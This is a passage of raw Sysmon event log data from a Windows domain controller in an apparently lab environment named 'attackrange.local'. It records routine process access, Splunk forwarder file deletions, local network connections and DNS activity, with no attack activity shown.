13:54:19.569{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200592Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:19.569{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200591Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:19.569{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200590Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:19.569{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200589Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:19.569{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-E68B-6040-E54D-00000000AD01}5852C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002200588Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:19.569{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E68B-6040-E54D-00000000AD01}5852C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002200587Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:19.570{5ABCFE62-E68B-6040-E54D-00000000AD01}5852C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002200598Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:20.850{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DFD34BB61043938791DB845512378953,SHA256=F42AC76397690DAFF0DECD787BDB0F7C971B9501CC0C3CF4643FB05021EC8192,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200599Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:21.850{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6AB48CAEC6C6F05467D3A1BCC93F0220,SHA256=BF45F0883DBBE0D39707A2F54916F079537CB333D63D4E02E07E675A8CA76F4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200601Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:22.850{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4959B8194DFF3F5611E27D0E44B7EE9,SHA256=36FBEC8AEDCC4B76968161C91315CADE5B0D2E9638824EF7707F7884EE5FEBE3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200600Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:22.194{5ABCFE62-842F-603E-1100-00000000AD01}620NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=981BA9CC69D8350DFD438E3009A6916C,SHA256=0814A3941EC6499855E2E7AE3EC70208098F7C06BCC6F1D35A3A2BAF7BFBE939,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200604Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:23.866{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3605B750B92D9713EE4E861DDD1D45F5,SHA256=F2A5C64E562FA187740C1BD101C7A855D615CEB787C125135DF1D149D217F65C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200603Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:19.891{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55141-false10.0.1.12-8000- 23542300x80000000000000002200602Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:23.069{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8654E3F05AE5AFCEB1BBDEE2E32F3159,SHA256=51A2E46E8634048983CAF4837C4019432E8833095D86781D6220F59A9B66DC28,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200605Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:24.881{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70996E5C94A346176736B39D5828F790,SHA256=B20E049B515161BBD9CF85810F706BF5358B0B2F078577F7484C978A6238EB82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200606Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:25.881{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7C2100924E99F703928826115EBF71F,SHA256=C026799CD01A0619FA992F9329D408AF09B4DE2C4CBC1B88C5B205C08B666D07,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200608Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:26.897{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB8B50780C97B05F9BB9F1EC49DC850A,SHA256=0EE4E2F182A7289D49069875502BD249AA14408F939066B67EC96842D1E2C8AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200607Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:26.788{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5DDF8827224BA8D37B0853166E961383,SHA256=D7DF9D657D03A824D6E3F952C11C1217FA5C4BB87522225E5A6517E639BCAACB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200610Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:27.897{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED7F74F7F00CB002BC7C5AD5E851E05A,SHA256=69E3B4228B452084EAB2614DBE815F447D046E6A33342295A5A7C5A897AFAD0A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200609Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:27.319{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F86172A8804C9F57E181B9DD89287D0D,SHA256=C313A66BD84B1DC72ED5B3064BFAE6C9C534B9538D20D018A649E0A54046F085,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200613Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:28.913{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71F008D28F7C7684FE990F63375DC32B,SHA256=F249DEBC38610F65738DC82521AC986C31A8DC2F6488C1861852BFEBB8202923,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200612Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:24.938{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55143-false10.0.1.12-8000- 23542300x80000000000000002200611Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:28.116{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=366149181E6DB0DF78B67162A7C410FD,SHA256=EBAB46B551154A77F9D1D391A88079B90541BF32FC74E5B8ABE8D07999EBA388,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200615Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:29.928{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=131FE4E1A52EAE58E3280F551C5C87B9,SHA256=A736C0A5BE9A517AD49B386D90695D9AEBAFD85467B73AA497DCE440FAAAFEF2,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200614Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:25.937{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local64463- 23542300x80000000000000002200618Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:30.928{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DEC2C738AF757AB69852C76CE0A1C980,SHA256=C26F9EA33B49F4F66CB89C2794B66DBB98BE28E739EA46BB6D593E94FC400717,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200617Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:26.953{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-64463- 23542300x80000000000000002200616Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:30.225{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1F08B48F53981E76BE969A3AA7933F92,SHA256=494A50002620BB1EF65B100DD5674B6DBB104FA867DC23F9B99A5786B2A5AF03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200619Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:31.944{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D789D320B6B2A6CA80116359C2234DAB,SHA256=F2818BFAA81DC8158BB9A7DCB70498530AB814EC8D3C4225B1A76D630F10FDD8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200621Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:32.960{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E76675F1EBD50F977EA8C9CB392F9150,SHA256=D2D7D677363D40396204C0D1640C145E947BC96B26040546FF6A7678EA13B872,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002200620Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:32.803{5ABCFE62-842F-603E-0D00-00000000AD01}9124764C:\Windows\system32\svchost.exe{5ABCFE62-99F4-603E-8307-00000000AD01}1624C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002200623Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:33.975{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DEA01C42A10B6A58DC2722CA4B2FB4D3,SHA256=2104B5439DF19853150B40E1FBCA7BADFDFD901E67B0842724F7E7DD5044FD1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200622Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:33.131{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=62B760877B100841C3E024E99DB9E05D,SHA256=4504DF9F92F014F7DA2BD1DDE4880A863CABD1328A5B65A96DF82A4260FF1554,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200624Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:34.975{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4820EAC284595BA6F9BC6CE66084ABE4,SHA256=F47C4C5A566161417C822F1F7FA38E9A62B76EE4F781593C8908ECDBF38A6B11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200627Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:35.991{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA6E0F74F8960891ABFBB2B5D843B441,SHA256=4C28FB4851E61D49320DF70047F193E0A319291E56BF9A5C4C535F460AAD27CD,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200626Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:30.000{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55144-false10.0.1.12-8000- 354300x80000000000000002200625Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:29.971{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruefe80:0:0:0:0:ffff:ffff:fffe-62980-true2001:7fe:0:0:0:0:0:53i.root-servers.net53domain 23542300x80000000000000002200629Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:37.163{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=700CA07CFC9556BB3A05837962820DB3,SHA256=0F00636F363B4D38AAE950BB056E636CC16570858766A8354CD071DEE19D76A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200628Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:37.006{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3276DFFB68DF71CB900A75AEDE6B9927,SHA256=064C8513E9195B3BA10024F041608E22B098D1D89D4E206C67AAB94DA2FD99F4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200632Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:35.063{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55145-false10.0.1.12-8000- 23542300x80000000000000002200631Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:38.241{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=24C139E08C8304FFFB7C78130CFF298D,SHA256=9B476E73250183B85247AD065F21206DBA33A8644DAFAED262EA5297EA847CF9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200630Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:38.006{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=15C469596991076262CF4FBFEC6214DD,SHA256=35A22F45D5F31717C7909B97746839D4D3C21AD66468B174115D14774032259E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002200635Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:39.288{5ABCFE62-842F-603E-0D00-00000000AD01}9124764C:\Windows\system32\svchost.exe{5ABCFE62-842F-603E-1200-00000000AD01}392C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200634Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:39.288{5ABCFE62-842F-603E-0D00-00000000AD01}9124764C:\Windows\system32\svchost.exe{5ABCFE62-842F-603E-0F00-00000000AD01}296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002200633Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:39.022{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=361DB0674B30318AFF060C8E8C1C5E75,SHA256=391206AC66F463AFB0E9E3D688F1B67E615CB722331F6ACDF9DED9EAFE3B8DFE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200636Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:40.022{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CFE8EDCF70C9BACD6C9ED731479E7EB5,SHA256=D62E125919C2F37F901E69CABB480DD1D5DCE7C73CED1AF3D251B459A1623BB8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200637Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:41.038{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 